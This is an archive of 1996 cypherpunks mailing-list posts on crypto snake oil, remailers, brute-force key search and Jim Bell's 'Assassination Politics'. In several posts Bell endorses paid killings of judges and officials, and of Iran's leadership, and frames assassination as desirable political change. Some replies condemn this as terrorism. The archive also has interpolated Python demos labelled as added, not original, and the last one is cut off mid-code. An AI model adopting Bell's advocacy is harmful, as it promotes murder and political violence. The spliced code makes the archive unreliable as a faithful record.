Who says so, and how >> >>> can they be certain? Jim's suggestion has never, to my knowledge, been >> >>> tried on a consistant, large, scale. When all conventional alternatives >> >>> have been tried and fail, what have we or the starving children got to >> >>> lose? >> >> >> >>I think "Lord of the Flies" answers this question quite well. >> > >> >Does it? LOTF was fiction. Can you identify a recent instance in which a >> >non-governmental organization attempted to influence political/military >> >events via a concerted AP? >> > >Where is Jimmy Hoffa? And it worked! Jim Bell jimbell at pacifier.com From jimbell at pacifier.com Sun Sep 22 12:04:30 1996 From: jimbell at pacifier.com (jim bell) Date: Mon, 23 Sep 1996 03:04:30 +0800 Subject: timmy waxes a widdle on AP Message-ID: <199609221630.JAA09213@mail.pacifier.com> At 03:05 AM 9/22/96 EDT, Dr.Dimitri Vulis KOTM wrote: >I was reading the other day about the lessons learned from the one-time >tax refund in 1975. Most consumers realized that this is a one-time deal >and saved most of it, rather than spent it. On the other hand, after Reagan's >tax cuts the consumers spent much of their newly retained income because they >believed that the lower tax rate would continue for a few years. > >Likewise once an occasional gubment official in Mexico is assassinated >often enough for the population to perceive public service as being a >hazardous profession, they'll have trouble recruiting the replacements. >Assassinations won't work as long as they're perceived by the public as >zero-probability events. The public perception depends on other factors >besides the numbers or the frequency of the hits. That's generally correct. The "they'll just hire replacements" argument is given by people who don't understand that under full operation of AP, THINGS WILL CHANGE! And once things start changing, they will change very rapidly. 
Jim Bell jimbell at pacifier.com From jimbell at pacifier.com Sun Sep 22 12:25:12 1996 From: jimbell at pacifier.com (jim bell) Date: Mon, 23 Sep 1996 03:25:12 +0800 Subject: Kill 'em and let God sort it out, was Re: The GAK Momentum is Building... Message-ID: <199609221651.JAA10237@mail.pacifier.com> At 10:04 PM 9/21/96 -0700, Steve Schear wrote: >> jim bell wrote: >>Naturally, you won't even consider the possibility of going outside the >>system to solve a problem. The rest of us notice that there are probably >>thousands of terminally-ill people who would gladly act as a human kamikaze >>and get rid of any judge inclined to impose such a fine, for a payment of 1% >>of this principle amount to a family member or loved one, leaving 99% >>available for the few other judges foolish enough to basically commit >>suicide by taking up a futile gesture. >> > >If AP came to be seen as an acceptable way for business and citizens to >right egregious wrongs it would quickly lead to a 'law of the jungle' >situation, which I think any sane person would reject as the cure being >worse than the disease. Don't assume that means anything definitive, however. _SOME_ sane people are simply WRONG! Indeed, I'm fond of pointing out that 95% of the things people say are wrong about AP are, themselves, wrong. (Even by the standards of people who'd agree with their general conclusion.) Suppose I could convince you that an AP-dominated world would be, in general, far safer, better, more just, than the status quo. At that point, would you STILL say "any sane person would reject" it? Probably not. I suggest, therefore, that your statement above is based on a misunderstanding of AP. Other people, people who have thought about the matter far longer than you, agree with me. Moreover, after discussing AP with as many people as I have, it's quite predictable that a person would come to a conclusion based on a false belief. 
However, if governemnts (especially ours) continue >to expand their implied authority and greatly diminishing personal >liberties we all took for granted were inaliable human rights (in our own >best interest, of course), a time may come when a bit of rebellion may be >the only viable alternative for self-correction. Here's the big problem: Let's suppose you think like this. "Someday we _may_ have to rebel. Not today." Gradually, over time, the circumstances get worse. However, as surprising as it may seem, we get used to the problems, and morever a new generation of people are born who've never seen freedom. The line we draw in the sand today just appears to get further and further away. We never cross it, and thus we never rebel, no matter how bad the circumstances get. The most realistic position to take, I think, is to conclude that the line in the sand has ALREADY been crossed, long ago, and that it is high time to act. The beauty of AP is that it will allow "little revolutions" to occur daily, until they are no longer needed. Jim Bell jimbell at pacifier.com From dthorn at gte.net Sun Sep 22 12:25:53 1996 From: dthorn at gte.net (Dale Thorn) Date: Mon, 23 Sep 1996 03:25:53 +0800 Subject: Snake-Oil FAQ In-Reply-To: <199609220854.DAA27487@mailhub.amaranth.com> Message-ID: <32456CE1.B60@gte.net> William H. Geiger III wrote: > In , on 09/21/96 at 04:47 PM, > Lance Cottrell said: > >I am setting up just such a list. I plan to award products for both > >excellent and lousy crypto. This really should be a committee (yuch) > >effort, so if you would like to participate, please let me know. > I would be intrested in this. I would like to see the following > information made available for any product that made it on to the > list: > Detailed listings of pro/cons of the product. > Contact with the authors & listing of any rebutials they may have for > the cons. > A appendix to the list explaining why the individule points are a pro > or a con for crypto products. 
When you get right down to it, this calls for a mini-encyclopedia of crypto products (or even sub-products such as pre-processors or "encryption engines"). The basic outline for any products included (and don't forget, just getting included is some sort of endorsement, if you know what I mean) could be a feature/bug listing, using common crypto terminology, and could be followed by side-by-side argument paragraphs from the author and from a reputable review panel. The usefulness of the list would probably depend on: 1. The participation of all those names people like to name-drop on this forum. 2. And/or the quality of the list itself if done without (1.) above. In this latter case, it could still be useful, but the variances in evaluation owing to personal bias would be difficult to overcome. From jimbell at pacifier.com Sun Sep 22 12:38:00 1996 From: jimbell at pacifier.com (jim bell) Date: Mon, 23 Sep 1996 03:38:00 +0800 Subject: AP [was: Re: Kiddie porn on the Internet] [NOISE] Message-ID: <199609221651.JAA10247@mail.pacifier.com> At 05:32 AM 9/22/96 -0500, William H. Geiger III wrote: >In <199609220708.AAA20288 at dfw-ix2.ix.netcom.com>, on 09/22/96 at 12:09 AM, > Bill Stewart said: >>If the US _had_ really wanted to assassinate Saddam, they could have >>hired professionals to do the job (like Mossad.) Instead they >>killed 200,000 other Iraqis, including civilians, draftees, and a >>few tens of thousands of real soldiers. > >You need to take into account the politics of the region. With Saddam gone you have >created a power vaccume that Iran would be all to happy to fill. It was for this >reason that durring the Gulf War the US & its allias (European & Arab) did not go to >Bagdad. They mearly wanted to knock Saddam down a notch or two not take him out. You're thinking like a statist. If Saddam's death leaves "a power vacuum," then simply kill the leadership of Iran, and any other nearby state with designs on the middle east. Gee, whats the problem? 
This "kill the leadership" system gets mighty addictive! Where will it end? Which is why it isn't started in the first place. The people who might start it are the ones with the most to lose if it spreads. That's why Saddam is alive today. Jim Bell jimbell at pacifier.com From hallam at vesuvius.ai.mit.edu Sun Sep 22 12:45:20 1996 From: hallam at vesuvius.ai.mit.edu (hallam at vesuvius.ai.mit.edu) Date: Mon, 23 Sep 1996 03:45:20 +0800 Subject: AP [was: Re: Kiddie porn on the Internet] [NOISE] In-Reply-To: <199609220708.AAA20288@dfw-ix2.ix.netcom.com> Message-ID: <9609221638.AA16343@vesuvius.ai.mit.edu> I agree with Bill, AP sounds like a very good club for the Exon types to beat us with. Jim's latest comments sounded no different to me than the mealy-mouthed "understanding" messages that Sinn Fein publish about the IRA. Given the opportunity to condemn any attack on the President under AP rules we get a noncommittal non-condemnation. It's the type of thing that Gerry Adams says after his men have just killed two kids with a bomb in a litterbin outside a McDonald's. Ideology is a powerful political weapon. It simplifies complex political issues and generates momentum allowing political change. Unfortunately it also creates bad government as ideology pursued for the sake of ideology. Ideology does not debate, it acts. When Marxism was created in the latter half of the 19th century it had many useful effects. In particular it definitely assisted the transition from monarchy to democracy by creating a widespread belief that the existing situation was unstable. By the end of the first world war however this energy had largely served whatever purpose it would, at least in Europe if not in other parts of the world. Unfortunately a very large number of people had failed to realise that it was an ideology whose time had come and gone. The industrial and political situation it addressed no longer existed.
The major left wing movements by that time were socialism and liberalism, both of which rejected the Marxist extreme. As the Marxist ideologues got frustrated by their evident lack of progress they turned to terrorism. The Baader-Meinhof gang believed that they could spark the revolution by jolting society out of its complacency. Their strategy was remarkably like AP. If the heads of large corporations were likely to be assassinated then no one would want to lead a large firm. In fact as any person with counter-terrorism experience will tell you the threat of death is remarkably ineffective as a means of intimidation. It creates the opposite effect, strengthening the resolve of the target. I discussed this point recently with someone close to Mossad who agreed. Terrorism is becoming an increasing concern. The amount of damage an individual can cause is much greater than that possible in the past. There are plenty of exhausted ideologies about which can be fashioned into a justification of murder. Jim's post shows very clearly how Libertarianism can be converted into a justification for terrorism. It's a very short gap between being opposed to government and actively fighting against it. I see libertarianism as the exhausted remnant of the mercantilism of the 1980s. As constructed it recognises only those rights which favour the privileged in society and none of those which benefit the economically disadvantaged. Politically it reached its peak influence almost a decade ago when Reagan and Thatcher were at their zenith. The '94 congress will probably be seen as the turning point in the political tide with the mainstream of politics moving back to the left again. There will always be people around who conclude that the failure was not being close enough to the ideology. If the libertarians are not careful they will be inexorably linked in the public mind with the terrorists who act in their name.
Phill From jamesd at echeque.com Sun Sep 22 12:50:04 1996 From: jamesd at echeque.com (James A. Donald) Date: Mon, 23 Sep 1996 03:50:04 +0800 Subject: Timmy May's spam (Was: Re: CIA hacked) Message-ID: <199609221727.KAA00049@dns2.noc.best.net> At 08:55 AM 9/22/96 EDT, Dr.Dimitri Vulis KOTM frothed: > I'm not "worried", since Timmy May has already earned the reputation of a > nutcase and a liar in these circles, Back to the kill file. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From nobody at replay.com Sun Sep 22 12:57:37 1996 From: nobody at replay.com (Anonymous) Date: Mon, 23 Sep 1996 03:57:37 +0800 Subject: Macintosh Mixmaster port... Who's doing it? In-Reply-To: Message-ID: <199609221731.TAA18577@basement.replay.com> "Myers W. Carpenter" wrote: > Does anyone have any idea who might be attempting a Macintosh > Mixmaster port? I and some other people were eyeing the idea. If you > know who might be doing this port I would appreciate hearing from them. > Thanks. > myers You can run mixmaster on a mac, see http://mklinux.apple.com/ From tcmay at got.net Sun Sep 22 13:26:59 1996 From: tcmay at got.net (Timothy C. May) Date: Mon, 23 Sep 1996 04:26:59 +0800 Subject: Snake-Oil FAQ Message-ID: At 4:44 PM 9/22/96, Dale Thorn wrote: >The basic outline for any products included (and don't forget, just >getting included is some sort of endorsement, if you know what I mean) >could be a feature/bug listing, using common crypto terminology, and >could be followed by side-by-side argument paragraphs from the author >and from a reputable review panel. > >The usefulness of the list would probably depend on: >1. The participation of all those names people like to name-drop on this > forum. >2. 
And/or the quality of the list itself if done without (1.) above. > In this latter case, it could still be useful, but the variances in > evaluation owing to personal bias would be difficult to overcome. The Basic Problem (tm) with a "Snake Oil FAQ" is that the very persons most in need of it won't read it. If those who post descriptions of their "Unbreakable Virtual Whammo-Matic Really Complicated Transposition Cipher" have not bothered to read Schneier or other basic texts on ciphers, why would they bother to read a Snake Oil FAQ? This applies to their customers as well. It doesn't take much reading of standard crypto books to learn why historical codes and ciphers (and their reinvented modern variants) are fundamentally weak, and subject to (usually rapid) breaking with high-speed computers. Once this basic point is realized, all else follows. In other words, there is really no meaningful target audience for a Snake Oil FAQ. If it's just a quick effort, fine. But escalating it into a Major Cypherpunks Project seems like wasted effort. Just point people to Schneier's book and suggest they read and absorb the first several chapters. Then, like the infamous fisherman, they'll be equipped to understand why the Whammo-matic Really Complicated Cipher is neither Virtually Unbreakable nor worthy of spending much time analyzing, and why they should stick with modern ciphers and systems which have been subjected to years of review and attempts to break them. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." 
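Tim May's point that reinvented classical ciphers fall quickly to computer search can be seen with a plain columnar transposition, used here as a stand-in for the hypothetical "Really Complicated Transposition Cipher". This is an added example, not part of the original post; the plaintext, key and guessed word (crib) are constructed for the demonstration.

```python
"""Probable-word attack on a columnar transposition cipher (constructed demo)."""
from itertools import permutations
from math import factorial

# Constructed sample data: not taken from any real product or message.
PLAINTEXT = "OURPROPRIETARYUNBREAKABLECIPHERPROTECTSTHEQUARTERLYSALESFIGURESTODAY"
SECRET_KEY = (3, 0, 6, 2, 5, 1, 4)   # order in which the 7 columns are read out
CRIB = "UNBREAKABLE"                 # word the analyst guesses is in the text


def encrypt(plaintext, key):
    """Write the text in rows of len(key), then read the columns in key order."""
    k = len(key)
    columns = [plaintext[c::k] for c in range(k)]
    return "".join(columns[c] for c in key)


def decrypt(ciphertext, key):
    """Invert encrypt(), including the short columns of an incomplete last row."""
    k = len(key)
    full_rows, extra = divmod(len(ciphertext), k)
    columns = [""] * k
    pos = 0
    for c in key:
        # Columns to the left of `extra` hold one more character.
        length = full_rows + (1 if c < extra else 0)
        columns[c] = ciphertext[pos:pos + length]
        pos += length
    rows = []
    for r in range(full_rows + 1):
        rows.append("".join(col[r] for col in columns if r < len(col)))
    return "".join(rows)


def keyspace(max_key_len):
    """Number of column orders to consider for key lengths 2..max_key_len."""
    return sum(factorial(k) for k in range(2, max_key_len + 1))


def crack(ciphertext, crib, max_key_len=7):
    """Try every column order; return (key, plaintext, keys_tried) on a crib hit."""
    tried = 0
    for k in range(2, max_key_len + 1):
        for key in permutations(range(k)):
            tried += 1
            candidate = decrypt(ciphertext, key)
            if crib in candidate:
                return key, candidate, tried
    return None, None, tried


if __name__ == "__main__":
    ct = encrypt(PLAINTEXT, SECRET_KEY)
    key, text, tried = crack(ct, CRIB)
    print("ciphertext:", ct)
    print("recovered key:", key, "after", tried, "of", keyspace(7), "keys")
    print("plaintext:", text)
```

The whole key space for up to seven columns is 5912 orderings, which is why a cipher of this family gives no protection however elaborate its marketing name.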
From mixmaster at remail.obscura.com Sun Sep 22 13:52:09 1996 From: mixmaster at remail.obscura.com (Mixmaster) Date: Mon, 23 Sep 1996 04:52:09 +0800 Subject: Jena Remailer Message-ID: <199609221720.KAA15948@sirius.infonex.com> lutz at as-node.jena.thur.de wrote to All: >> Also, is there any other remailer (now that anon.penet.fi is down) >> that allows one to have an anonymous address to receive >> email? l> anon at as-node.jena.thur.de. But it's is bit tricky. The trickiest thing about it - by far - is the inscrutable English translation of the helpfile. I have been trying for over a week to make any sense of how to use the remailer. Granted, it works differently than the other pseudonymous remailers, but the helpfile is simply impenatrable. Like many translations, it is grammatical but makes no sense in spots. >From what I can make out, this is probably a very useful and innovative remailer that I should very much like to use. Can any native English speaker please paraphrase the account start-up procedure for us? Is mixmaster at as-node.jena.thur.de a standard T-1/T-2 remailer? Who has the key? Fingering this account doesn't work from West Coast USA. Thanks for any help... From jjacobs at mail.koyote.com Sun Sep 22 13:56:24 1996 From: jjacobs at mail.koyote.com (Joel Jacobs) Date: Mon, 23 Sep 1996 04:56:24 +0800 Subject: [Fwd: Re: All Bets Off] Message-ID: <2.2.32.19960922183603.00698770@mail.koyote.com> I just got passed this, don't know the context, nor the thread. Clancy was NOT a Navy captain. He does tons of research for his books....his advisor IS a retired Navy Captain named J.M. Rodgers. How do I know? I also use Captain Rodgers as a consultant, AND, I e-mail with Clancy a couple or three times a week. BTW: I'm a retired U.S. Navy Chief Journalist. HTH. 
Joel Jacobs Co-author of the soon to be published, "Death Watch" >Return-Path: betsat at texoma.com >Date: Sun, 22 Sep 1996 13:22:27 -0500 >From: >To: jjacobs at mail.koyote.com >Subject: [Fwd: Re: All Bets Off] > >The Deviant wrote: >> >> On Thu, 19 Sep 1996, Daniel Christopher Miskell wrote: >> >> > Date: Thu, 19 Sep 1996 11:30:32 -0400 >> > From: Daniel Christopher Miskell >> > To: Rabid Wombat >> > Cc: cypherpunks at toad.com >> > Subject: Re: All Bets Off >> > >> > >On Tue, 17 Sep 1996, Jeff Davis wrote: >> > > >> >> [lots of quoting rm'd] >> >> > >> > Tom Clancy is not a military-hired brain, but to make his novels realistic and >> > to do justice to the people he portrays, he does a LOT of research. He is a >> > highly respected author, and I have no doubt that his statement is based on >> > his personal findings, collected for a previous novel. >> > >> >> I beleive he was also a Capain in the Navy... >> >> --Deviant >> Old MacDonald had an agricultural real estate tax abatement. 
> >-- >---------------------------------- >Bernie and Shirley Taner >betsat at texoma.com >---------------------------------- >Path: news.texoma.com!news.uoregon.edu!arclight.uoregon.edu!chi-news.cic.net!newsp ump.sol.net!www.nntp.primenet.com!nntp.primenet.com!howland.erols.net!netnew s.com!uhog.mit.edu!grapevine.lcs.mit.edu!ai-lab!ai-lab!not-for-mail >From: The Deviant >Newsgroups: ailab.cypherpunks >Subject: Re: All Bets Off >Date: 19 Sep 1996 20:30:11 -0400 >Organization: MIT Artificial Intelligence Lab >Lines: 26 >Sender: daemon at ai.mit.edu >Message-ID: <51soij$kh2 at life.ai.mit.edu> >NNTP-Posting-Host: life.ai.mit.edu > >On Thu, 19 Sep 1996, Daniel Christopher Miskell wrote: > >> Date: Thu, 19 Sep 1996 11:30:32 -0400 >> From: Daniel Christopher Miskell >> To: Rabid Wombat >> Cc: cypherpunks at toad.com >> Subject: Re: All Bets Off >> >> >On Tue, 17 Sep 1996, Jeff Davis wrote: >> > > >[lots of quoting rm'd] > >> >> Tom Clancy is not a military-hired brain, but to make his novels realistic and >> to do justice to the people he portrays, he does a LOT of research. He is a >> highly respected author, and I have no doubt that his statement is based on >> his personal findings, collected for a previous novel. >> > >I beleive he was also a Capain in the Navy... > > --Deviant >Old MacDonald had an agricultural real estate tax abatement. > > > -------------- 30 -------------- Joel Jacobs jjacobs at koyote.com "Most people yearn for the return to an idealized past, a past, which, in fact, never existed." Frank Herbert, "Dune" From alano at teleport.com Sun Sep 22 14:17:53 1996 From: alano at teleport.com (Alan Olsen) Date: Mon, 23 Sep 1996 05:17:53 +0800 Subject: Snake-Oil FAQ Message-ID: <3.0b16.32.19960922114533.00704c20@mail.teleport.com> At 03:48 AM 9/22/96 -0700, Timothy C. May wrote: >The Basic Problem (tm) with a "Snake Oil FAQ" is that the very persons most >in need of it won't read it. 
>
>If those who post descriptions of their "Unbreakable Virtual Whammo-Matic
>Really Complicated Transposition Cipher" have not bothered to read Schneier
>or other basic texts on ciphers, why would they bother to read a Snake Oil
>FAQ? This applies to their customers as well.

I agree that it will not change the glorified decoder ring salesmen, but it can have a positive effect on their customers.

The FAQ has the ability to reach those who would not necessarily read Schneier or any other large tome.

Most of the people outside of this forum have some understanding of cryptography. Most of that understanding is based on folklore and marketing hype. If we do not take pains to educate them as to what real crypto is, then we might as well just sit here and prattle on about Assassination Politics and ad hominem.

You seem to take a pretty negative attitude about what the general public can and cannot learn from. If Cypherpunks do not help educate the masses, who will? The snake oil salesmen? The Government? The masses themselves? They are not going to go out and buy a book intended for programmers. (And especially one that costs about $50.) There are no "cryptography for dummies" books. (At least none worth a damn.)

A FAQ has the ability to propagate in channels that books cannot. You cannot forward a book via e-mail. (Some will claim I have tried...)

The FAQ has the capability to do a lot of good. If not, where do you think the energy would be better spent?

"If it saves just one newbie..."

---
Alan Olsen -- alano at teleport.com -- Contract Web Design & Instruction
`finger -l alano at teleport.com` for PGP 2.6.2 key
http://www.teleport.com/~alano/
"We had to destroy the Internet in order to save it." - Sen. Exon
"Microsoft -- Nothing but NT promises."

From adam at homeport.org Sun Sep 22 14:59:18 1996
From: adam at homeport.org (Adam Shostack)
Date: Mon, 23 Sep 1996 05:59:18 +0800
Subject: Macintosh Mixmaster port... Who's doing it?
In-Reply-To: <199609221731.TAA18577@basement.replay.com> Message-ID: <199609222016.PAA00572@homeport.org> | "Myers W. Carpenter" wrote: | | > Does anyone have any idea who might be attempting a Macintosh | > Mixmaster port? I and some other people were eyeing the idea. If you | > know who might be doing this port I would appreciate hearing from them. | > Thanks. | > myers | | You can run mixmaster on a mac, see http://mklinux.apple.com/ No, you can run UNIX on Mac hardware, and then run Mixmaster on UNIX. You can also get AUX and MachTen to run Linux on your Mac hardware. Both are production systems, unlike the DR1 release of MkLinux. MachTen (www.tenon.com) has the clear advantage for most people of being able to run Mac & Unix apps at the same time. However, there is a real need for things like Mixmaster/DOS, the WinSock remailer, and other tools that allow the average home user to set up a remailer without taking the several days or more to install a new OS on their system. A real Mac port of Mixmaster, that integrated with Claris EMailer and Eudora would be a huge boon to the millions of Mac users out there. I have no doubt that Vinnie's mac crypto conference talked a lot about this sort of thing. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From johnbr at atl.mindspring.com Sun Sep 22 15:01:00 1996 From: johnbr at atl.mindspring.com (John Brothers) Date: Mon, 23 Sep 1996 06:01:00 +0800 Subject: Internet File System? Message-ID: <1.5.4.32.19960922191022.00736898@pop.mindspring.com> The other day, it occurred to me that Java could really take off if there was some sort of file system. And, since you can't write to local files with Java, the obvious solution is to set up the 'fopen, fclose(), etc) set of functions that are 'rpcs' to some server application on the same computer as the web server the applet comes from. 
Since I never manage to come up with new concepts, I assume someone is already working on this, or has already created this.

In any case, I've been trying to figure out the best balance of security characteristics for this sort of system. I've written something up at a very high level -- Please let me know what is wrong with it.

1) Before any files can be written or read, the applet has to prompt the user for a password.
2) Password is encrypted one-way, and sent to the server.
3) Server establishes a 'session' (TCP) with the client. At that point, the options are:
   -- use SSL to maintain security (probably the best, if available)
   -- providing some sort of encryption, similar to SSL
4) Server would handle all the traditional file manipulation routines, possibly with some restrictions (no access to directories, maybe?)
5) If someone wanted to get a local copy, they would have to ftp to the server, and go to the appropriate place to get it.

I can tell this has a couple of weaknesses:

a) central authority for creating accounts, maintaining users, etc.
b) server side can view all the files at will.
c) susceptible to trojan servers

I don't know how to reliably solve a). If you don't have some sort of central user admin, you can't avoid denial of service/resource wasting attacks.

b) Could be solved by having the user type in (or cut and paste, etc) their entire public key. They could ftp the encrypted document back, and decrypt it with the private key. This would detect and prevent a lot of problems, but dealing with the key would be a bit cumbersome.

c) If the server has to send out some sort of validation code that the clients have to accept, it will work ok. But if the attacker has access to the server, they may have access to the java code, and may be able to modify it to not perform the validation.

Any ideas? Thanks for your time.

---
John Brothers
Do you have a right not to be offended?
From thecrow at iconn.net Sun Sep 22 15:18:44 1996
From: thecrow at iconn.net (jack)
Date: Mon, 23 Sep 1996 06:18:44 +0800
Subject: Evolving algorithm for faster brute force key searches?
Message-ID: <31DD74B1.BB3@iconn.net>

I got an idea last night, maybe this has already been thought of and tried, but I thought I would give a quick outline of the program I was thinking of:

-Specify a maximum key size (assume 1024bits or something)
-Start with an arbitrary key "aaaaaaaaaaaaaa"

Start a loop

-create five mutations of the key
-use each key to try and decrypt a few bytes of the message
-run a (or some) statistical analysis tests and come up with a value for how 'random' the decrypted bits are
-Pick the key that produced the least random output

Repeat

Probably this wouldn't work on any very strong algorithm, but it seems it might be effective against some. I am going to write the code and try it out on RC4 and on a weakling little algorithm I wrote a while back. Let me know what y'all think.

From tcmay at got.net Sun Sep 22 15:35:16 1996
From: tcmay at got.net (Timothy C. May)
Date: Mon, 23 Sep 1996 06:35:16 +0800
Subject: Snake-Oil FAQ
Message-ID:

At 6:53 PM 9/22/96, Alan Olsen wrote:

>I agree that it will not change the glorified decoder ring salesmen, but it
>can have a positive effect on their customers.
>
>The FAQ has the ability to reach those who would not necessarily read
>Schneier or any other large tome.

Really? You think someone thinking about buying a cryptographic product for his company, for example, will read an obscure Snake Oil FAQ (even the name presumes familiarity with why some products are "snake oil") while not bothering to read the opening chapters of Denning, Schneier, Brassard, or other such texts?

I'll address the issue of "the masses" below.

>Most of the people outside of this forum have some understanding of
>cryptography. Most of that understanding is based on folklore and
>marketing hype.
If we do not take pains to educate them as to what real >crypto is, then we might as well just sit here and prattle on about >Assassination Politics and ad hominem. My view is that people interested in buying and using crypto are either bright enough to learn, or are not. A "Snake Oil FAQ" is largely unnecessary, for either category. For the first, because they're bright. For the second, because they're not. >You seem to take a pretty negative attitude about what the general public >can and cannot learn from. If Cypherpunks do not help educate the masses, >who will? The snake oil salesmen? The Government? The masses themselves? > They are not going to go out and buy a book intended for programmers. >(And especially one that costs about $50.) There are no "cryptography for >dummies" books. (At least none worth a damn.) And just who are "the masses"? I've never cared for that term, and rarely use it. But, for the sake of this discussion, just who might they be? Our mothers and fathers who don't use computers? Our neighbors who maybe have a Pentium at work but don't much use computers otherwise? The guy buying a game machine for his kids at CompUSA? The average reader of sci.crypt? (:-}) I believe there is no meaningful way to "reach the masses" until they first show some interest in the subject. And once they do, there is a plethora of ways to learn the basics of cryptography. Nearly all libraries have several books, and nearly every bookstore I have seen has copies of Schneier. Further, the various FAQs available already cover enough of the basics for someone to know why, for example, a "virtual one-time pad, with keys issued by our company" is patently bogus. Again, if "Joe Average" hasn't encountered this sort of stuff, no "Snake Oil FAQ" is likely to reach him. I do think there's a potential "market" for such a Snake Oil FAQ: the journalists who are looking for a pithy line to use in a review of "Super Bass-O-Matic Virtual Decoder Ring." 
But that's about the only market (or reader base) I see. Have fun with it, just don't gull yourself into thinking it's something "the masses" will read. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From dlv at bwalk.dm.com Sun Sep 22 16:00:39 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Mon, 23 Sep 1996 07:00:39 +0800 Subject: Spam from Timmy May (fart) and his merry band of mailbombers Message-ID: <5saouD5w165w@bwalk.dm.com> Is this another one of Tim May's accounts? ]From varange at crl.com Sun Sep 22 15:39:37 1996 ]Received: by bwalk.dm.com (1.65/waf) ] via UUCP; Sun, 22 Sep 96 15:59:10 EDT ] for dlv ]Received: from mail.crl.com by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; ] id AA01600 for dlv at bwalk.dm.com; Sun, 22 Sep 96 15:39:37 -0400 ]Received: from crl13.crl.com by mail.crl.com with SMTP id AA02700 ] (5.65c/IDA-1.5 for ); Sun, 22 Sep 1996 12:40:01 -0700 ]Received: by crl13.crl.com id AA05247 ] (5.65c/IDA-1.5 for dlv at bwalk.dm.com); Sun, 22 Sep 1996 12:33:43 -0700 ]From: Troy Varange ]Message-Id: <199609221933.AA05247 at crl13.crl.com> ]Subject: Re: [NEWS] ]To: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) ]Date: Sun, 22 Sep 1996 12:33:43 -0700 (PDT) ]In-Reply-To: from "Dr.Dimitri Vulis KOTM" at Sep 18, 96 08:07:56 pm ]X-Mailer: ELM [version 2.4 PL23] ]Mime-Version: 1.0 ]Content-Type: text/plain; charset=US-ASCII ]Content-Transfer-Encoding: 7bit ]Content-Length: 1605 ] ]> ]> American Banker, 9/17/96 ]> ]> CHASE TO OFFER DEALERSHIPS AUTO LOAN DECISIONS OVER INTERNET 
]> ]> Chase Manhattan Corp.'s auto financing division has begun using the ]> Internet to provide dealerships with loan-approval decisions. The bank ]> is the first of eight financial institutions that have committed to ]> using the system, developed by IBM Corp. By computerizing loan ]> applications and sending data electronically, Chase officials said the ]> bank can grant approvals in as few as two minutes. Up to 50% of the ]> division's auto loans will be running through the system within the ]> next 18 months. Chase, the largest car lender not affiliated with a car ]> company, is connected to six dealerships currently using the system and ]> will establish connections to 100 dealers with the official introduction ]> in October. Other financial institutions planning to use the on-line ]> system include NationsBank Corp., G.E. Capital Auto Financial Services ]> Inc., Regions Financial Corp., and Citibank Puerto Rico. The dealer's ]> computer is connected to the Internet through the IBM Globa l Network, ]> which is also used to retrieve an encrypted report from a credit bureau. ]> The dealer's pre-established "key" decodes the report and causes the ]> screen to display one, two, or three stars -- representing poor, fair, ]> or good credit. This gives the dealer an idea of which financial ]> institutions are most likely to approve the loan. ]> ]> --- ]> ]> Dr.Dimitri Vulis KOTM ]> Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps ]> ]F^Ackhead. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From tcmay at got.net Sun Sep 22 16:48:07 1996 From: tcmay at got.net (Timothy C. May) Date: Mon, 23 Sep 1996 07:48:07 +0800 Subject: Evolving algorithm for faster brute force key searches? 
Message-ID:

At 8:01 PM 7/5/96, jack wrote:
>I got an idea last night, maybe this has already been thought of and
>tried, but I thought I would give a quick outline of the program I was
>thinking of:
>
>-Specify a maximum key size (assume 1024bits or something)
>-Start with an arbitrary key "aaaaaaaaaaaaaa"
>
>Start a loop
>
>-create five mutations of the key
>-use each key to try and decrypt a few bytes of the message
>-run a (or some) statistical analysis tests and come up with a value
>for how 'random' the decrypted bits are
>-Pick the key that produced the least random output

Schneier actually used my explanation of why this won't work in the Second Edition of his book.

Basically, with any strong, modern cipher, there is no concept of "getting closer" to a solution. Thus, the "fitness landscape" for a brute-force-needed cipher looks like a flat plain (if portrayed in two dimensions), with the solution/key being a single-point spike rising from the plain. No hill-climber can find this spike except by landing right on it, which means evolutionary programming, genetic algorithms, simulated annealing, and neural net sorts of approaches are worthless.

With some weak ciphers, this might work. I think Schneier makes some comments about who's looked at this. But weak ciphers are not too interesting.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May               | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA   | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."
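Added example, not part of any message in the archive: a small Python experiment that runs jack's mutate-and-score loop against RC4 (the cipher he names) and measures the two properties the replies in this thread appeal to, the flat "fitness landscape" and the roughly half-of-output-bits change per flipped key bit. The key, the plaintext, the printable-ASCII score used as the "how random is it" test, and all function names are assumptions made for this illustration.

```python
import random

# Constructed sample data: this key and plaintext are made up for the demo.
KEY = bytes.fromhex("3a91c05e7728d4b61f0a9be2456cd873")
PLAINTEXT = b"The quick brown fox jumps over the lazy dog. " * 6


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4: key scheduling, then XOR of data with the keystream."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
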